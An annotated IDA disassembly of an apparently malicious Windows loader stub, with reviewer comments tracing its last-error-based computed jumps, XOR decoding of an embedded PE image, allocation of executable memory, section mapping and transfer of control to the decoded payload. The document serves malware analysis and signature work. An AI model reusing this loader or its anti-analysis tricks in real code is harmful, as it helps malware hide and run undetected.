;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	B3FD1B8F9B34D7F7EF8D14E2CE6283B1

; File Name   :	u:\work\b3fd1b8f9b34d7f7ef8d14e2ce6283b1_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 0000029E (	670.)
; Section size in file		: 0000029E (	670.)
; Offset to raw	data for section: 00001000
; Flags	60000020: Text Executable Readable
; Alignment	: default

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
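; Import address table (IAT) of the stub, RVA 1000h (see the FirstThunk value
; 1000h in the import data at the end of this segment).
; Line breaks were lost in the original listing, which left dword_401004,
; dword_401008 and dword_40100C inside a trailing comment even though the
; code below references them; one definition per line is restored here.
; The values are absolute addresses IDA annotated as "resolved to" an export.
; NOTE(review): presumably captured on the machine where the sample was
; dumped; they depend on that system's DLL builds and should not be treated
; as indicators of the sample itself.
dword_401000	dd 7C8300DAh	; resolved to->KERNEL32.CancelIo
dword_401004	dd 7C810A77h	; resolved to->KERNEL32.GetFileSize
dword_401008	dd 7C910331h	; resolved to->NTDLL.RtlGetLastWin32Error
; Slots reached as dword_40100C+N in the code. Names for +4..+10h are not
; annotated by IDA; by the order of the import names at the end of this
; segment they appear to be:
;   +0    GetModuleHandleA
;   +4    Sleep
;   +8    VirtualAlloc
;   +0Ch  VirtualProtect
;   +10h  VirtualUnlock
dword_40100C	dd 7C80B6A1h, 7C802442h, 7C809A51h, 7C801AD0h, 7C85E6DAh
					; resolved to->KERNEL32.GetModuleHandleA
					; DATA XREF: .text:00401096r
					; .text:00401108r ...
		dd 4 dup(0)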

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

		public start

; start: program entry (named by the 'end start' directive).
; Builds an ebp frame with 1Ch bytes of locals, then calls GetFileSize through
; the IAT without pushing any arguments and jumps to 40104Ah + the value
; returned by RtlGetLastWin32Error. The branch target is therefore only known
; at run time, which is why IDA closes the procedure at the 'jmp eax'.
; NOTE(review): with an error value of 6 the target is 401050h, which by
; instruction-length count is the instruction right after this procedure;
; confirm in a debugger. Tools that do not reproduce the API's last-error
; value will follow a different target and lose the real control flow.
; Clobbers: eax, ebx, esp (ebx is not preserved for the caller).
start		proc near
		push	ebp
		mov	ebp, esp
		mov	eax, eax	; no effect: register moved onto itself
		sub	esp, 1Bh	; with the dec below, esp is lowered by 1Ch in total
		dec	esp
		mov	ebx, esp	; keep esp so it can be restored after the call
		call	dword_401004	; GetFileSize, called with no pushed arguments
		mov	esp, ebx	; undo whatever the callee removed from the stack
		call	dword_401008	; RtlGetLastWin32Error
		add	eax, 40104Ah	; eax = 40104Ah + last-error value
		jmp	eax		; computed jump, target depends on the error code
start		endp

; ---------------------------------------------------------------------------
		; Second stage, outside any IDA procedure; it still uses the ebp
		; frame set up in 'start'. Initialises three locals:
		;   [ebp-14h] = 2000h      offset later added to the module base
		;   [ebp-0Ch] = 1AF62DE9h  base of the initial XOR value
		;   [ebp-8]   = 1A5BAC89h  amount added to the XOR value per dword
		; Then repeats the pattern used in 'start': call an IAT slot with no
		; pushed arguments, restore esp, and jump to a constant plus the
		; last-error value.
		; NOTE(review): dword_40100C+10h is the last IAT slot, VirtualUnlock by
		; the order of the import names at the end of this segment. The next
		; instruction run starts at 40107Dh by instruction-length count, which
		; would correspond to an error value of 57h; confirm in a debugger.
		push	2000h
		pop	dword ptr [ebp-14h]
		mov	dword ptr [ebp-0Ch], 1AF62DE9h
		mov	dword ptr [ebp-8], 1A5BAC89h
		mov	ebx, esp	; keep esp across the argument-less call
		call	dword_40100C+10h
		mov	esp, ebx
		call	dword_401008	; RtlGetLastWin32Error
		add	eax, 401026h	; eax = 401026h + last-error value
		jmp	eax		; computed jump, not resolvable statically
; ---------------------------------------------------------------------------
		; Third stage: locate the embedded data and prepare the decode loop.
		; CancelIo is called with no pushed arguments and the following
		; last-error value is never read (eax is overwritten before use).
		; NOTE(review): these two calls have no visible effect on the data
		; flow; presumably filler or an environment check, verify dynamically.
		mov	ebx, esp
		call	dword_401000	; CancelIo
		mov	esp, ebx
		call	dword_401008	; RtlGetLastWin32Error
		mov	dword ptr [ebp-4], 6	; constant later added to [ebp-0Ch]
		push	0
		call	dword_40100C	; GetModuleHandleA
		add	eax, [ebp-14h]	; eax = returned module base + 2000h
		push	dword ptr [eax+74h]
		pop	dword ptr [ebp-10h]	; [ebp-10h] = dword at base+2074h, used as a byte count
		lea	eax, [eax+86h]
		add	eax, 2		; eax = base + 2088h (86h + 2)
		mov	[ebp-14h], eax	; [ebp-14h] = start of the encoded buffer
		; Call to IAT slot +0Ch with (address, size, 4, 0) in argument order.
		; NOTE(review): slot +0Ch appears to be VirtualProtect by import-name
		; order; 4 would then be PAGE_READWRITE and the last argument a NULL
		; old-protection pointer. The return value is not checked.
		push	0
		push	4
		push	dword ptr [ebp-10h]
		push	dword ptr [ebp-14h]
		call	dword_40100C+0Ch
		xor	ecx, ecx
		add	ecx, [ebp-10h]	; ecx = byte count
		mov	ebx, [ebp-14h]	; ebx = current position in the buffer
		mov	eax, [ebp-0Ch]
		add	eax, [ebp-4]	; eax = initial XOR value, [ebp-0Ch] + [ebp-4]


; In-place decode loop: each dword at [ebx] is XORed with eax, then eax is
; advanced by the dword at [ebp-8] and ebx by 4. ecx holds the bytes left and
; is lowered by 4 per pass (sub 2, dec, dec). The 'jl' reads the flags of the
; last 'dec', so the loop ends once the count goes negative; a count that
; reaches exactly 0 still gets one more pass.
; The step value and the initial XOR value come from constants stored in the
; frame earlier in this listing; together with this loop shape they are
; candidates for a static signature of the stub.
loc_4010CF:				; CODE XREF: .text:004010DEj
		xor	[ebx], eax	; decode one dword in place
		sub	ecx, 2
		dec	ecx
		dec	ecx		; ecx -= 4 in total
		jl	short loc_4010E0	; done when the remaining count is negative
		add	eax, [ebp-8]	; next XOR value
		add	ebx, 4		; next dword
		jmp	short loc_4010CF
; ---------------------------------------------------------------------------


; Allocate memory for the decoded buffer and copy its leading part.
; The offsets read here match the PE32 header layout (3Ch = e_lfanew,
; +6 = NumberOfSections, +34h = ImageBase, +50h = SizeOfImage,
; +54h = SizeOfHeaders, +0F8h = first section header).
; NOTE(review): presumably the decoded buffer is a PE image; no MZ/PE
; signature is checked and the allocation result is not tested for zero.
loc_4010E0:				; CODE XREF: .text:004010D6j
		xor	eax, eax
		mov	ebx, [ebp-14h]	; ebx = start of decoded buffer
		mov	esi, ebx
		mov	ebx, [ebx+3Ch]
		add	ebx, esi	; ebx = buffer + dword at buffer+3Ch
		mov	al, [ebx+6]	; only the low byte of the count is used
		mov	[ebp-18h], eax	; [ebp-18h] = loop count for the section copy
		; Call to IAT slot +8 with ([ebx+34h], [ebx+50h], 3000h, 40h).
		; NOTE(review): slot +8 appears to be VirtualAlloc by import-name
		; order; 3000h would be MEM_COMMIT|MEM_RESERVE and 40h
		; PAGE_EXECUTE_READWRITE, requested at the address stored at [ebx+34h].
		push	40h
		push	3000h
		push	dword ptr [ebx+50h]
		push	dword ptr [ebx+34h]
		call	dword_40100C+8
		push	eax		; save the returned pointer across the next call
		push	0
		call	dword_40100C+4	; slot +4, Sleep by import-name order (argument 0)
		pop	eax
		mov	[ebp-4], eax	; [ebp-4] = base of the new allocation
		; sub_401176(count = [ebx+54h], src = decoded buffer, dst = allocation)
		push	eax
		push	dword ptr [ebp-14h]
		push	dword ptr [ebx+54h]
		call	sub_401176
		lea	esi, [ebx+0F8h]	; esi = first 28h-byte table entry


; Copy loop over 28h-byte table entries starting at esi. For each entry:
;   dst   = [ebp-4]  + [esi+0Ch]
;   src   = [ebp-14h] + [esi+14h]
;   count = [esi+10h]
; which matches VirtualAddress, PointerToRawData and SizeOfRawData of a PE
; section header (NOTE(review): presumed, confirm against the decoded data).
; The body runs before the counter at [ebp-18h] is tested, so it executes at
; least once, and none of the offsets or sizes are range-checked.
loc_401124:				; CODE XREF: .text:00401145j
		mov	ecx, [ebp-4]
		add	ecx, [esi+0Ch]
		push	ecx		; dst
		mov	eax, [ebp-14h]
		mov	ecx, 14h
		add	eax, [ecx+esi]	; same as [esi+14h]
		push	eax		; src
		push	dword ptr [esi+10h]	; count
		call	sub_401176
		add	esi, 28h	; next table entry
		dec	dword ptr [ebp-18h]
		jnz	short loc_401124
		; Final stage: redirect the return address, patch a marker in the new
		; copy, and return into it.
		; [ebp+4] is the return-address slot of the frame created in 'start',
		; so the 'leave / retn' at the end transfers control to
		; [ebp-4] + [ebx+28h] (NOTE(review): +28h matches AddressOfEntryPoint
		; in a PE32 header; confirm).
		mov	eax, [ebx+28h]
		add	eax, [ebp-4]
		mov	[ebp+4], eax	; overwrite the saved return address
		; ecx = 3DAB0A2Fh + 6D10C2AEh = 0AABBCCDDh, the first dword of
		; dword_401194. NOTE(review): the value is built from two halves,
		; presumably so the marker does not appear literally in the code.
		mov	ecx, 3DAB0A2Fh
		add	ecx, 6D10C2AEh
		mov	eax, [ebp-4]	; scan starts at allocation base + 4


		; Scan in 4-byte steps until a dword equals the marker. There is no
		; upper bound: if the marker is absent the scan runs off the buffer.
loc_40115E:				; CODE XREF: .text:00401163j
		add	eax, 4
		cmp	[eax], ecx
		jnz	short loc_40115E
		; sub_401176(count = 38h, src = dword_401194, dst = marker location)
		push	eax
		lea	eax, dword_401194
		push	eax
		push	38h
		call	sub_401176
		leave
		retn			; returns to the address written to [ebp+4] above

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


; sub_401176: forward byte-by-byte copy.
; Stack arguments (callee removes 0Ch bytes with 'retn 0Ch'):
;   arg_0 = number of bytes to copy
;   arg_4 = source address
;   arg_8 = destination address
; Preserves esi and edi; changes al, ecx and flags. No return value is set.
; The count is decremented after the first byte is copied, so a count of 0 is
; not special-cased: ecx wraps and the loop keeps going.
sub_401176	proc near		; CODE XREF: .text:00401119p
					; .text:0040113Ap ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	esi
		push	edi
		mov	esi, [ebp+arg_4]	; esi = source
		mov	edi, [ebp+arg_8]	; edi = destination
		mov	ecx, [ebp+arg_0]	; ecx = byte count


loc_401184:				; CODE XREF: sub_401176+15j
		mov	al, [esi]
		mov	[edi], al	; copy one byte
		inc	esi
		inc	edi
		dec	ecx
		jnz	short loc_401184
		pop	edi
		pop	esi
		leave
		retn	0Ch
sub_401176	endp

; ---------------------------------------------------------------------------
		align 4
; dword_401194 is the source of the 38h-byte copy made just before the stub
; returns; its first dword is the marker 0AABBCCDDh that the stub scans for.
dword_401194	dd 0AABBCCDDh, 15Ah, 0
; ---------------------------------------------------------------------------
; NOTE(review): the five "instructions" below and the 'db 0Fh' after them are
; most likely data that IDA decoded as code. They add up to 8 bytes, and
; together with the 3 dwords above and the 9 dwords that follow they make
; exactly 38h bytes, the length copied from dword_401194. Nothing in the
; listing branches here.
		push	ds
		add	al, 0
		add	al, dl
		inc	edx
		retn
; ---------------------------------------------------------------------------
		db 0Fh
		dd 47C342D0h, 5071E842h, 12D77E4Bh, 924DAAD9h, 0E8C242D0h
		dd 0E3C242D0h, 0F0C242D0h, 2 dup(0)
; From here on the bytes are consistent with the import data of the stub:
; one import descriptor (first dword 11F4h, name RVA 1290h split across the
; db lines, FirstThunk 1000h) followed by an all-zero terminator.
		dd 11F4h, 2 dup(0)
		db 90h
		db 12h,	2 dup(0)
		dd 1000h, 5 dup(0)
; Eight RVAs into the hint/name entries below, zero-terminated.
		dd 1218h, 1224h, 1232h,	1242h, 1256h, 125Eh, 126Eh, 1280h
		dd 0
; Hint/name entries stored as little-endian dwords. Decoded as ASCII they
; read, in order: CancelIo, GetFileSize, GetLastError, GetModuleHandleA,
; Sleep, VirtualAlloc, VirtualProtect, VirtualUnlock, then the DLL name
; KERNEL32.dll. This order gives the meaning of the IAT slots at 401000h.
		dd 61430027h, 6C65636Eh, 6F49h,	6547015Bh, 6C694674h, 7A695365h
		dd 1680065h, 4C746547h,	45747361h, 726F7272h, 1750000h
		dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 33E0000h
		dd 65656C53h, 36A0070h,	74726956h, 416C6175h, 636F6C6Ch
		dd 3700000h, 74726956h,	506C6175h, 65746F72h, 7463h, 69560374h
		dd 61757472h, 6C6E556Ch, 6B636Fh, 4E52454Bh, 32334C45h
		dd 6C6C642Eh
		db 2 dup(0)
_text		ends

; Section 3. (virtual address 00005000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00004600
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 405000h
		align 2000h
_idata2		ends


		end start